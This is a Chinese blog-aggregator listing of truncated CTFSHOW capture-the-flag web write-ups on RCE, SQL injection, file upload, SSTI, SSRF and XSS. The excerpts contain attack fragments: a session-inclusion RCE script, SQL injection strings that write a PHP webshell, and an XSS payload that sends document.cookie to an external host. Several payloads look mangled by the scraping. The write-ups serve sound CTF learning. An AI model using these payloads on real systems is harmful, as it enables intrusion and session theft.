E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
CTFSHOW
[
ctfshow
2023元旦水友赛]web题解
文章目录easy_include方法一session文件包含方法二pearcmd.php本地文件包含easy_webeasy_logineasy_include源码'}data2={'2':'system("cat/f*");','1':'localhost/tmp/sess_'+sess}file={'file':'abc'}cookies={'PHPSESSID':sess}stop_thre
_rev1ve
·
2024-01-07 13:29
CTF比赛
web安全
安全
网络
学习
php
CTF特训(一):
ctfshow
-RCE挑战
CTF特训(一):
ctfshow
-RCE挑战FLAG:可后来,除了梦以外的地方,我再也没有见过你专研方向:代码审计,PHP每日emo:其实挺迷茫的,不知道该干什么,(骗你的)RCE挑战1代码分析:这段PHP
是liku不是里库
·
2024-01-06 21:07
CTF
CTF
web安全
python
【Web】
CTFSHOW
元旦水友赛部分wp
目录①easy_include②easy_web③easy_loginweb一共5题,我出了3题,巧的是好像师傅们也只出了3题,跨年拿旗还是很快乐的,下面直接贴出自己的wp.①easy_includepearcmd不解释这里主要是,file://协议支持以file://localhost/etc/hosts的方式访问服务器文件,来绕过开头必须是字母的限制②easy_web代码审计,大致思路是通过构
Z3r4y
·
2024-01-03 21:07
ctfshow
元旦水友赛
ctf
web
安全
ctfshow
——PHP特性
文章目录web89web90web89使用人工分配ID键的数值型数组绕过preg_match.两个函数:preg_match():执行正则表达式,进行字符串过滤。preg_match函数用法,正则表达式语法。[0-9]匹配0-9之间的所有字符。/相当于一个分隔符,/../之间的内容就是正则的语法。绕过方法:变量num为人工分配ID键的数值型数组,preg_match()就会失效。如num[]=1,
PT_silver
·
2024-01-03 13:05
渗透测试实践
php
开发语言
ctfshow
——信息搜集
文章目录web1web2web3web4web5web6web7web8web9web10web11web12web13web14web15web16web17web18web19web20web1题目提示开发注释未及时删除。直接右键查看源代码。web2在这关我们会发现:1)无法使用右键查看源代码;2)F12也无法调用控制台查看源代码。解决方法:ctrl+u查看源代码;在url前面加view_so
PT_silver
·
2024-01-03 13:00
渗透测试实践
安全
【Web】
Ctfshow
Thinkphp5 非强制路由RCE漏洞
目录非强制路由RCE漏洞web579web604web605web606web607-610前面审了一些tp3的sql注入,终于到tp5了,要说tp5那最经典的还得是rce下面介绍非强制路由RCE漏洞非强制路由RCE漏洞原理非强制路由相当于开了一个大口子,可以任意调用当前框架中的任意类的任意方法并传参。下面是该漏洞的利用条件:要修复这个漏洞非常简单,启用强制路由即可很简单的道理,举个例子index
Z3r4y
·
2024-01-01 23:09
thinkphp5
ctf
web
ctfshow
代码审计
安全
非强制路由rce
ctfshow
--RCE极限挑战
本周
ctfshow
的挑战注重点为RCE,主要利用是:自增绕过RCERCE挑战1属于简单类型源码error_reporting(0);highlight_file(__FILE__);$code=$_POST
yb0os1
·
2024-01-01 17:16
CTF
php
网络安全
CTF
开发语言
CTFSHOW
国赛复现-----Unzip(软连接利用)
然后再对test进行压缩zip-rtest1.ziptest再上传该压缩包,因为解压后的目录同名所以会覆盖原指定目录所以此时目录是var/www/html/cmd.php上传后访问cmd.php就可以getshell了参考:2021深育杯线上初赛官方WriteUp-先知社区(aliyun.com)
Sharpery
·
2023-12-31 11:07
web
ctf
web
ctfshow
——文件上传
文章目录文件上传思路web151web152web153知识点解题web154web155web156web157web158web159文件上传思路web151打开页面显示:前台校验不可靠。说明这题是前端验证。右键查看源代码,找到与上传点有关的前端代码: 这里使用了一个叫Layui的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。可见这里前端只允
PT_silver
·
2023-12-28 21:54
渗透测试实践
安全
ctfshow
-命令执行篇[Web29-Web50]
Web29代码如下:error_reporting(0);if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/flag/i",$c)){eval($c);}}else{highlight_file(__FILE__);}命令里不能有flag,使用占位符?或者*:/?c=system("ls");/?c=system("tacfla*");/?c
一碗海鲜汤
·
2023-12-27 15:09
CTF show 71
CTFshow
71在源码中可以看到程序把缓冲区内容全部替换成了问号ob_get_contents函数把缓冲区内容读到以后赋值给了变量s,类型是字符串。
梧六柒
·
2023-12-25 20:55
web安全
web安全
ctfshow
中web入门第web41
ctfshow
中web入门第web41留下了|运算绕过的方法那么直接利用脚本即可。先用or运算的php脚本生成需要的规则文件(.txt文件)。
梧六柒
·
2023-12-24 14:38
web安全
web安全
ctfshow
sql 195-200
195堆叠注入十六进制if(preg_match('/|\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|\'|\"|select|union|or|and|\x26|\x7c|file|into/i',$username)){$ret['msg']='用户名非法';die(json_encode($ret));}可以看到`没被过滤,select空格被过滤
木…
·
2023-12-22 22:24
sql
数据库
前端
文件上传漏洞(全网最详细)
目录前言文件上传漏洞介绍文件上传漏洞危害文件上传漏洞满足条件文件检测流程
CTFSHOW
151关-170关151关:前端验证绕过152关:后端校验Content-Type校验文件格式153关:filename
貌美不及玲珑心,贤妻扶我青云志
·
2023-12-16 20:59
安全
web安全
php
Bypass open_basedir
ctfshow
题目:error_reporting(0);highlight_fi
El.十一
·
2023-12-16 01:59
android
ctfshow
sql 191-194
191ascii过滤发现ascii被过滤ascii可以用ord来代替importrequestsurl="http://7620054f-1ea0-4231-950d-faad23a9dbe7.challenge.ctf.show/api/"#payload="""admin'andif(ord(substr((selectdatabase()),{0},1))>{1},1,0)--+"""#pa
木…
·
2023-12-16 01:20
sql
数据库
[SUCTF 2018]MultiSQL MYSQL 预处理写
首先这道题需要预处理写马之前在
ctfshow
中学习过预处理我们来看看
CTFSHOW
-SQL注入-CSDN博客首先我们开始判断是否存在注入2^(if(1=0,1,0))2^(if(ascii(mid(user
双层小牛堡
·
2023-12-14 14:45
BUUctf
mysql
数据库
ctfshow
sql 186-190
unionseleCT1,2,database()--+1'unionseleCT1,2,table_namefrominformation_schema.tableswheretable_schema='
ctfshow
_web
木…
·
2023-12-06 08:34
java
前端
服务器
ctfshow
题解记录
菜狗杯杂项签到图片题属性没信息拖进010editor搜索
ctfshow
,找到了!
CodingJazz
·
2023-11-29 11:21
安全
CTFSHOW
sqll注入
=号过滤绕过=号和不加通配符的like是一样的。还可以使用在mysql中等于!=如果在加一个!双重否定代表肯定就是=了空格过滤绕过/**/,(),`,tab,两个空格orandxornot过滤绕过and=&&or=||xor=|#not=!1.模糊匹配://拼接sql语句查找指定ID用户$sql="selectid,username,passwordfromctfshow_userwhereuse
El.十一
·
2023-11-27 23:58
android
【Web】
Ctfshow
Thinkphp3.2.3代码审计(1)
①web569②web570③web571④web572①web569基础考察/index.php/Admin/Login/ctfshowLogin②web570提示找路由查看附件源码(config.php)发现定义了一个可执行命令的路由规则/index.php/
ctfshow
Z3r4y
·
2023-11-26 12:06
前端
CTF
WEB
安全
笔记
thinkphp
ctfshow
ctfshow
sql注入笔记
用hex()/to_base64()绕过检测‘flag’174.检测结果中的数字先用select1,2找到回显点,再用replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(‘a1a2a3a4a5a6a7a8a9a0’,‘1’,‘!’),‘2’,‘@’),‘3’,‘#’),‘4’,‘$’),‘5
weixin_51439723
·
2023-11-25 12:29
web安全
sql
ctfShow
sql注入笔记
遇到了sql注入的题目,记录一下sqlmap使用过程一、手工注入测试1、简单的万能注入先测试一下用户名:admin')or1=1#/admin'and1=1#/admin'or1=1#/admin'and-1=-1....密码:123'结果没测出来,也没报错,一点反应都没有二、sqlmap工具扫描先用sqlmap跑一下,找出注入点1、将请求包写入1.txt,然后执行sqlmap-r1.txt--b
whatever`
·
2023-11-25 12:29
web安全
安全
CTFShow
SQL入门记录
CTFShowSQL入门记录入门级SQL注入,也作为一个学习记录吧,有150道题慢慢更新,也希望学到一些新姿势(只会用sqlmap一把梭的菜鸡)-u指定注入点–dbs跑库名–tables跑表名–columns跑字段名–dump枚举数据-D指定库-T指定表-C指定字段–random-agent每次访问切换请求头防ban–delay=1每次探测延时一秒防banweb171这里没有任何的过滤就直接常规查
paidx0
·
2023-11-25 12:59
CTFShow刷题篇
CTFshow
SQL
web171——常规操作~2'and1=1#2'and1=2#数据接口请求异常:parsererror2'and1=1--+回显正常,且爆出所有信息,说明“--+”其效果了。“#”这种注释方式不成功2'unionselect1,2,3---成功回显1,2,32'unionselect1,group_concat(table_name),3frominformation_schema.tablesw
王俊凯迷妹
·
2023-11-25 12:24
sql
ctfshow
_sql注入
文章目录WEB172WEB173WEB174web175web176WEB177总结web178web179web180web181web182_同上web183_where子句web184_右连接、内连接、having子句方法一方法二web185web186web187_md5绕过md5($password,true)的SQL注入问题web188_mysql弱比较web189-load_file
multi4
·
2023-11-25 12:53
#
web
sql
数据库
mysql
ctfshow
sql注入系列2
web183:代码这个就有点头大,数据库都要自己试,先把上一题的拿过来,不行倒反天罡试试,就就有了数据库的名字:
ctfshow
_user因为这个返回的只有1或0.那么就只能用脚本不断的去试,比如说看pass
九月一。
·
2023-11-25 12:21
sql
数据库
CTFSHOW
SQL注入篇(171-190)
文章目录无过滤171172173174175过滤176177178179180181182183184185|186187188189190无过滤前言下面几道无过滤的题都可以写入shell然后蚁剑连上后从数据库里面找,就统一写下做法,后面不在具体复述。具体做法如下id=0'unionselect1,""intooutfile"/var/www/html/1.php%23"有的是查询的三项所以pay
yu22x
·
2023-11-25 12:21
CTFSHOW
web入门系列
sql
web安全
php
CTFSHOW
SQL注入篇(191-210)
文章目录191192193|194195196197|198|199|200201202203204205|206206207208209210191把190脚本里面的ascii改成ord即可#author:yu22ximportrequestsimportstringurl="http://eb1ea450-7ad8-4a93-a682-4cdb5cf1adff.challenge.ctf.sh
yu22x
·
2023-11-25 12:21
CTFSHOW
web入门系列
sql
web安全
安全
CTFSHOW
SQL注入篇(211-230)
文章目录211212213214215216217218219220221222223224225-230225226227228|229|230211在上题的基础上加了个空格过滤,再稍微改改刚才的脚本fromlib.core.compatimportxrangefromlib.core.enumsimportPRIORITYimportbase64__priority__=PRIORITY.LO
yu22x
·
2023-11-25 12:21
CTFSHOW
web入门系列
sql
web安全
安全
ctfshow
sql注入系列1
这个系列题有点多,就10个一篇文章目录web171:web172:web173:web174:web175:web176:web177:web178:web179:web180:web181:web182:web171:仔细观察这个查询语句,发现有一个username!='flag',他不让我干什么,我就干什么,我给他一个拼接是id传入$sql="selectusername,passwordfr
九月一。
·
2023-11-25 12:51
sql
java
数据库
ctfshow
SQL注入Web175
查询语句//拼接sql语句查找指定ID用户$sql="selectusername,passwordfromctfshow_user5whereusername!='flag'andid='".$_GET['id']."'limit1;";返回逻辑//检查结果是否有flagif(!preg_match('/[\x00-\x7f]/i',json_encode($ret))){$ret['msg']
墨言ink
·
2023-11-25 12:20
sql
数据库
linq
ctfshow
sql注入171-187
sqli借此机会多学点sql语句,看看别人的语句是否奇妙web171$sql="selectusername,passwordfromuserwhereusername!='flag'andid='".$_GET['id']."'limit1;";单引号注入1ortrue%23#url编码web1721'orderby2--+//表-1'unionselect1,(selectgroup_conc
1-1A0
·
2023-11-25 12:20
CTF
sql
数据库
CTFshow
sql注入 上篇(web221-253)
`目录前言题目web221(limit注入)web222(groupby注入)web223(groupby注入)web224(文件名注入)web225(堆叠注入)解法一(handle)解法二(预编译)web226,web228-web230(堆叠注入)web227(堆叠注入)web231(update注入)解法1解法2web232(update注入)web233(update注入)web234(u
Kradress
·
2023-11-25 12:47
CTFshow
php
sql
ctfshow
文件上传 151-161
文件上传也好久没做了。。手很生了151前端绕过只能上传png文件使用bp抓包,修改文件名后缀为php上传成功,发现文件上传路径使用蚁剑连接找到flag152152后端校验跟上一关一样@表示后面即使执行错误,也不报错抓包修改文件后缀名蚁剑153.user.ini绕过php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件,.use
木…
·
2023-11-25 12:16
android
ctfshow
sql
180过滤%23%23被过滤,没办法注释了,还可以用’1’='1来闭合后边。或者使用--%0c--1'%0corder%0cby%0c3--%0c--1'%0cunion%0cselect%0c1,2,database()--%0c--1'%0cunion%0cselect%0c1,2,table_name%0cfrom%0cinformation_schema.tables%0cwhere%0c
木…
·
2023-11-25 11:43
sql
数据库
前端
CTFSHOW
-PHP特性
WEB89题目://里面的一般默认加引号,数字可以不用区别,但是字符串需要不然会报错但是不影响运行例如Warning:Useofundefinedconstantb-assumed'b'(thiswillthrowanErrorinafutureversionofPHP)in/Applications/phpstudy/WWW/test.phponline5string(3)"xxx"string
_Monica_
·
2023-11-23 05:15
CTFSHOW
安全漏洞
网络安全
信息安全
一些RCE的汇总
RCE自增RCE参考[
CTFshow
-RCE极限大挑战官方wp]RCE-1[过滤.(]RCE-2p[自增-Array]RCE-3[自增-NAN-过滤了(和.
有点水啊
·
2023-11-23 05:41
php
开发语言
【Web】preg_match绕过相关例题wp
目录①[FBCTF2019]rceservice②[
ctfshow
]web130③[
ctfshow
]web131④[NISACTF2022]middlerce简单回顾一下基础参考文章p牛神文preg_match
Z3r4y
·
2023-11-23 04:32
前端
笔记
安全
CTF
WEB
preg_match
【
CTFSHOW
】web入门 SSTI(更新中)
文章目录引言web361web362web363参考资料引言刷完SSRF、XSS,来学学SSTIweb361首先测试出get的参数名为:name。记得之前刷题时保存过一张大佬总结的测试流程图:根据图片规则进行测试:?name={{1*'4'}}返回结果:4则题目考察的很有可能是基于Jinja2的flask框架。payload:对于python3:(题目使用的是python3)使用popen函数:?
TurkeyMan
·
2023-11-22 15:16
CTFSHOW
python
flask
网络安全
ctfshow
刷题 [struts2]
目录一、Web279-S2-001二、Web280--S2-005三、Web281--s2-008四、Web301-代码审计五、Web302-代码审计六、Web303-代码审计七:网鼎杯:朱雀组开启靶机八、Xss九、Web78文件包含一、Web279-S2-001题目分析:如题s2-001是一个struts2命令执行漏洞编号一、判断网站是否基于Struts2的方法1、通过网页后缀来判断,如.do.
路向阳_
·
2023-11-22 15:46
CTF学习
struts
servlet
java
【Web】
Ctfshow
Nodejs刷题记录
①web334②web335③web336④web337⑤web338⑥web339⑦web340⑧web341⑨web342-343⑩web344①web334进来是一个登录界面下载附件,简单代码审计表单传
ctfshow
123456
Z3r4y
·
2023-11-22 15:13
前端
CTF
WEB
安全
笔记
ctfshow
nodejs
ctfshow
XSS刷题总结
简介这次把爪牙伸到了xss嘿嘿嘿开始日咯!web316用xss平台怎么也爆不出。。。可能是姿势不对用最原始的方法吧在自己的服务器上写一个hack.phpdocument.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?1='+document.cookieweb317今天学习了一款xss自动扫描的工具XSStrike似乎很好用的呢直接跑出
b1ue0cean
·
2023-11-22 15:42
CTF
CTFSHOW
XSS漏洞
目录准备工作第316-333关详细说明316关317关318关319关320关-326关327关328关329关330关331关332-333关准备工作关于这个平台:
CTFSHOW
的XSS平台是这样的你每次提交后
貌美不及玲珑心,贤妻扶我青云志
·
2023-11-22 15:42
xss
安全
前端
web安全
开发语言
ctfshow
-xss
316-326反射型期间有过滤script、img、空格、iframe的,不一一赘述,以下payload通316-326。存储型327因为要的是管理员cookie,收件人猜测填写admin,在邮件内容插入payload328管理员登录时,会看到所有用户的用户名和密码,只要注册一个带有xss代码的用户即可,当管理员访问该页面,就会执行在密码或者用户名插入payload都行,网站没有验证输入合法性。获
Vin0sen
·
2023-11-22 15:38
CTF
xss
javascript
【Web】
Ctfshow
XSS刷题记录
目录反射型XSS①web316②web317-319③web320-322④web323-326存储型XSS①web327②web328③web329④web330⑤web331⑥web332-333反射型XSS①web316直接输入alert(1),能弹窗。xss题目一般会有个bot,可以触发你的xss代码。如果直接获取cookie只能拿到自己的,这里提示要拿到admin的。payload:wi
Z3r4y
·
2023-11-22 14:05
xss
前端
CTF
WEB
javascript
笔记
安全
ctfshow
摆烂杯web wp
考试前不想复(预)习,正好是
ctfshow
的摆烂杯,就去做了几道web题文章目录web签到黑客网站一行代码web签到题目要输入三个整数A、B、C,ABC均不可为0,让A³+B³+C³=114,刚开始还想着爆破
Lum1n0us
·
2023-11-21 13:29
CTF
前端
php
开发语言
ctfshow
终极考核wp
web640web641web642web643web644web645web646web647web648web649web650web651web652web653web654web640打开页面就能看到flagctfshow{060ae7a27d203604baeb125f939570ef}web641抓取首页的包,看到有一个Flag字段
ctfshow
Lum1n0us
·
2023-11-21 13:29
CTF
渗透测试
php
web安全
【Web】
Ctfshow
SSTI刷题记录1
目录①web361362-无过滤②web363-过滤单双引号③web364-过滤单双引号和args④web365-过滤中括号[]、单双引号、args⑤web366-过滤单双引号、args、中括号[]、下划线⑦web367-过滤单双引号、args、中括号[]、下划线、os⑧web368-过滤单双引号、args、中括号[]、下划线、os、{{⑨web369-过滤单双引号、args、中括号[]、下划线、
Z3r4y
·
2023-11-19 23:19
前端
笔记
安全
SSTI
CTF
WEB
【Web】
Ctfshow
SSRF刷题记录1
核心代码解读curl_init():初始curl会话curl_setopt():会话设置curl_exec():执行curl会话,获取内容curl_close():会话关闭①web351post:url=http://127.0.0.1/flag.php或者url=file:///var/www/html/flag.php查看源码②web352-353前置知识:127.1会被解析成127.0.0.
Z3r4y
·
2023-11-19 15:02
前端
CTF
WEB
安全
笔记
上一页
1
2
3
4
5
6
7
8
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他